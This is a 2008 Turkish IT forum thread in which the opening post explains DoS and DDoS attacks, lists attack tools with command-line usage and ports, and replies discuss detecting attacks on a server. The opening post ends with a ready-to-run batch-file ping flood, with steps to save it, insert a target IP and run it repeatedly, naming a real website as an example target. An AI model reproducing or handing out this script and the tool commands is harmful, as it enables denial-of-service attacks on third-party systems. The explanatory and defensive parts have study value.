ÇÖZÜMPARK

Çözümsüz Sorunuz Kalmasın.
ÇözümPark'a hoş geldiniz. Oturum Aç | Üye Ol
in ARA
Ana Sayfa Makaleler Forumlar Resimler Dosyalar Biz Kimiz? Online Destek İletişim

DDoS atakları Nedir?

Son Mesajınız 03-17-2008, 9:58 Serhat AKINCI tarafından gönderildi. 8 yanıt.
Mesajları Sırala: Önceki Sonraki
  •  02-28-2008, 3:13 1795

    DDoS atakları Nedir?

    DDoS atakları Nedir? DDoS atakları Nedir?

    Bir saldırgan daha önceden tasarladığı BİR ÇOK makine üzerinden hedef bilgisayara saldırı yaparak hedef sistemin kimseye hizmet veremez hale gelmesini amaçlayan bir saldırı çeşididir.

    Koordineli olarak yapılan bu işlem hem saldırının boyutunu artırır hem de saldırıyı yapan kişinin gizlenmesini sağlar. Bu işlemleri yapan araçlara Zombi denir.
    Bu saldırı çeşidinde saldırganı bulmak zorlaşır.

    Çünkü saldırının merkezinde bulunan saldırgan aslında saldırıya katılmaz. Sadece diğer ip numaralarını yönlendirir.Eğer saldırı bir tek ip adresinden yapılırsa bir Firewall bunu rahatlıkla engelliyebilir. Fakat saldırı daha yüksek sayıdaki ip adresinden gelmesi Firewall un devre dışı kalmasını sağlar(Log taşması firewall servislerini durdurur).İşte bu özelliği onu DoS sadırısından ayıran en önemli özelliğidir.

    ================================================== ======

    DoS Ataklarının Türleri?

    Service Overloading: Bu atak tipi belirli host ve servisleri düşürmek için kullanılır. Atak yapan kişi özel port ve host a bir çok ICMP paketi gönderir.Bu olay network monitör ile kolayca anlaşılır

    Message flooding: Service Overloading den farkı sistemin normal çalışmasını engellemez. Yine aynı şekilde gönderilen paketler bu sefer normal olarak algılanır. Örnek Nis serverında flood yapılırsa (Unix network) Nis bunu şifre şifre isteği gibi görür. Ve saldırganın host a hükmetmesi sağlanır.

    Clogging: Saldırganın SYN gönderip ACK alıp ondan sonrada gelen ACK ya cevap vermeyip sürekli syn göndermesinden oluşur. Bu durum defalarca kez tekrarlanırsa server artık cevap veremez hale gelir. Bu paketler sahte ip ile gönderildiğinden sistem bunu anlayamaz ve hizmeti keser. Anlasa ne olur, anlasa aynı ip den gelen o kadar istege cevap vermez. Kurtuluş yolu bunları tarayan firewall lardır.

    DoS Atakları için kullanılan programlar?

    Ping Of Death
    Bir saldırgan hedef aldığı bir makineye büyük ping paketleri gönderir. Birçok işletim sistemi gelen bu maksimum derecede paketleri anlayamaz, cevap vermez duruma gelir ve işletim sistemi ya ağdan düşer ya da çöker.
    SSPing
    SSPing bir DoS aracıdır.SSPing programı hedef sisteme yüksek miktarda ICMP veri paketleri gönderir. İşletim sistemi bu aldığı data paketlerini birbirinden ayırmaya çalışır.Sonuç olarak bir hafıza taşması yaşar ve hizmet vermeyi durdurur.

    Land Exploit
    Land Exploit bir DoS atak programıdır. TCP SYN paketiyle hedef sisteme saldırıdır. Saldırı aynı port numarasına sürekli olarak yapılır. Land Expoit aynı kaynak ve hedef portları kullanarak SYN paketleri gönderir.
    Bir Çok Makine bu kadar yüklenmeyi kaldıramayacağı için Buffer overflow yaşar ve hiçbir bağlantıyı kabul edemeyecek duruma gelir.

    Smurf
    Smurf broadcast adreslere ICMP paketleri gönderen bir DoS Saldırı programıdır.Saldırgan ICMP echo istekleri yapan kaynak adresi değiştirerek ip broadcast a gönderir. Bu broadcast network üzerindeki her makinenin bu istekleri almasına ve her makinenin bu sahte ipli adrese cevap vermesini sağlar.Bu sayede yüksek seviyede network trafiği yaşanır. Sonuç olarak bir DoS saldırısı gerçekleşmiş olur.
    Bir TCP bağlantısının başında istekte bulunan uygulama SYN paketi gönderir. Buna cevaben alıcı site SYN-ACK paketi göndererek isteği aldığını teyit eder. Herhangi bir sebeple SYN-ACK paketi gidemezse alıcı site bunları biriktirir ve periyodik olarak göndermeye çalışır.
    Zombilerde kullanılarak, kurban siteye dönüş adresi kullanımda olmayan bir IP numarası olan çok fazla sayıda SYN paketi gönderilirse hedef sistem SYN-ACK paketlerini geri gönderemez ve biriktirir. Sonuçta bu birikim kuyrukların dolup taşmasına sebep olur ve hedef sistem normal kullanıcılarına hizmet verememeye başlar.

    WinNuke
    WinNuke programı hedef sistemin 139 nolu portuna “out of band” adı verilen verileri gönderir. Hedef bunları tanımlayamaz ve sistem kilitlenir.
    Kullanımı
    WNUKE4 -c XXX.com 10000 0 450
    (hedefe 10,000 adet 450 byte lık icmp paketleri gönderir.)
    WNUKE4 -n XXX.com 0 1024-2024 6667-6668 UNPORT

    Jolt2
    Jolt2 kendisini farklı segmentte bulunuyormuş izlenimi vererek NT/2000 makinelere DoS atak yapabilen bir programdır. İllegal paketler göndererek hedefin işlemcisini %100 çalıştırıp kilitlenmesine yol açar.
    c: \> jolt2 1.2.3.4 -p 80 4.5.6.7
    Komut satırında görülen, 1.2.3.4 ip numarası saldırganın spoof edilmiş adresidir. Hedef adresin 4.5.6.7 80 nolu portuna saldırı yapar.
    CPU kaynaklarını tamamını harcar ve sistemi aksatır

    Bubonic.c
    Bubonic.c Windows 2000 makineleri üzerinde DoS exploit lerinden faydalanarak çalışan bir programdır.
    Hedefe düzenli olarak TCP paketlerini gönderir.
    c: \> bubonic 12.23.23.2 10.0.0.1 100

    Targa
    Targa 8 farklı modül içinde saldırı yapabilen bir Denial of Service Programıdır.
    ================================================== =======

    DDoS Atakları için kullanılan programlar?
    1.Trinoo
    2.TFN
    3.Stacheldraht
    4.Shaft
    5.TFN2K
    6.mstream
    ================================================== =======


    DDOS – Saldırı Yöntemi

    Tüm DDoS programları iki safhada çalışır.
    Mass-intrusion Phase – Bu safhada DoS saldırısı yapacak olan sistemlere ulaşılır ve saldırıyı gerçekleştirecek olan programlar yüklenir. Bunlar birincil kurbanlardır.
    DDoS Attack Phase – Bu safhada hedef sitelere saldırı yapılır bunun içinde birincil kurbanlar kullanılarak hedefe yüklenilir.

    Trinoo
    Trinoo DDoS yöntemini kullanan ilk programdır.
    Kullandığı TCP Portları:
    Attacker to master: 27665/tcp
    Master to daemon: 27444/udp
    Daemon to master: 31335/udp

    TFN2K
    Zombilerin yüklendiği makineler listening modda çalışır. Her an karşıdan gelecek komutlara hazırdır.
    Running the server
    #td
    Running the client
    #tn -h 23.4.56.4 -c8 -i 56.3.4.5 bu komut 23.4.56.4 nolu ipden 56.3.4.5 nolu ip ye saldırı başlatır.

    Stacheldraht
    TFN ve Trinoo gibi çalışır fakat modüllerine paketleri kriptolu gönderebilir.
    Kullandığı portlar TCP ve ICMP
    Client to Handler: 16660 TCP
    Handler to and from agents: 65000 ICMP




    @echo off
    set count=
    :loop
    set count=%count%x
    start /b ping ip -l 65500 -n 30
    if not "%count%"=="xxxxxxxxxxxxxxxxxxxx" goto loop
    :end


    yukaridaki kodun icinde bulunan "ip" kismina saldiri yapmak istediginiz sitenin ip numarasini yazarsaniz. sonrasinda bu kod'u note pade'e ( not defteri ) yapistirip dosya adini "joker.bat" olarak kaydederseniz. basit bir ddos mantigini bilgisayarinizda joker.bat dosyasina cift tiklayarak calistirabilirsiniz. [ nuke ]

    ornek: ip kismina 66.228.117.90 yazarsaniz. sonrasinda belirtilen sekilde kaydederseniz. ve dosyayi 8 defa ard arda tiklarsaniz. wardom.org'a kendi bilgisayarinizdan yuksek miktarda veri pakedi gondermis olursunuz. bunu bir cok kullanicinin yapmasi demek wardom.org'u yavas kilmak demektir.

    Kaynak:Ceh 

  •  02-28-2008, 9:50 1815 Cevap 1795

    Cevap : DDoS atakları Nedir?

    Gerçekten güzel bilgiler tşk ederiz. Bizim serverdada şüpheledniğim durumlar var. logon olma esnasında çok sayıda hatalar mevcut. Ddos olup olmadığını nasıl anlayabilirim.
    "Güzel gören güzel düşünür, güzel düşünen hayatında lezzet alır"
  •  02-28-2008, 11:02 1829 Cevap 1815

    Cevap : DDoS atakları Nedir?

    Bülent Baloğlu:
    Gerçekten güzel bilgiler tşk ederiz. Bizim serverdada şüpheledniğim durumlar var. logon olma esnasında çok sayıda hatalar mevcut. Ddos olup olmadığını nasıl anlayabilirim.

    Selam. DOS atakları temelde iki şekilde servis durdurmaya çalışır. cpu, ram, bandwidth gibi kaynaklara aşırı yüklenerek yada servis üzerindeki bir zayıflığı kullanarak.

    Servis üzerindeki güvenlik açığını kullanarak gelen DOS ataklara maruz kalıyorsanız; açık ile ilgili updateleri geçmelisiniz, yayınlanmış bir update yok ise yayınlanmasını beklemelisiniz yada geçici süre o servisi devre dışı bırakıp alternatif servisler kullanmalısınız.

    Sistem kaynaklarına yüklenen DOS atakları alıyorsanız; CPU ve RAM için "process explorer", bandwidth ve ağ trafiği için "ethreal" gibi yazılımlar yardımı ile, atak alan sunucu üzerinde izleme yapmalısınız.


    serhatakinci.com
    MCP, MCSA+S+M, MCSE+S+M, MCTS:Vista
    MCITP| Enterprise Administrator
    MCITP| Enterprise Support Technician
    MCTS | Windows Server 2008 Active Directory
    MCTS | Windows Server 2008 Network Infrastructure
    MCTS | Windows Server 2008 Applications Infrastructure
  •  02-28-2008, 16:39 1917 Cevap 1829

    Cevap : DDoS atakları Nedir?

    serhat beyin söylediğine istinanen eger log on lardan şüpheleniyorsanız event viewer dan security sekmesine gelip filtreme yaparak kayıtların düşmesini sağlayabilirsiniz böylece hatalı log on ları görüp ona göre bir fitreleme veya güvenlik durumunu ayarlayabilirsiniz
  •  02-28-2008, 16:52 1923 Cevap 1917

    Cevap : DDoS atakları Nedir?

    Paylaşım için teşekkürler
    Milletleri kurtaranlar yalnız ve ancak öğretmenlerdir. Öğretmenden, eğiticiden mahrum bir millet, henüz bir millet adını alma yeteneği kazanmamıştır
    ------------------------------
    M.Kemal Atatürk
  •  02-28-2008, 20:07 1947 Cevap 1923

    Cevap : DDoS atakları Nedir?

  •  03-17-2008, 0:24 4164 Cevap 1947

    Cevap : DDoS atakları Nedir?

    linuxta snort kurularak incelenmesi gerekir diye düsünüyorum hakan hocam bir ip ucu vermis. :)
    Sistemin Taşaron Amelesi :)
    bimbilgi.com -Video Arenası
  •  03-17-2008, 9:08 4168 Cevap 4164

    Cevap : DDoS atakları Nedir?

    paylaşım için çok teşekkürler. serhat "çok pis ddos saldırısı yaparım" sen anladın onu :D
  •  03-17-2008, 9:58 4172 Cevap 4168

    Cevap : DDoS atakları Nedir?

    Hoşgeldin Davut.

    Adamımız uğramıyor bu aralar :))


    serhatakinci.com
    MCP, MCSA+S+M, MCSE+S+M, MCTS:Vista
    MCITP| Enterprise Administrator
    MCITP| Enterprise Support Technician
    MCTS | Windows Server 2008 Active Directory
    MCTS | Windows Server 2008 Network Infrastructure
    MCTS | Windows Server 2008 Applications Infrastructure
RSS haberlerini XML olarak görüntüle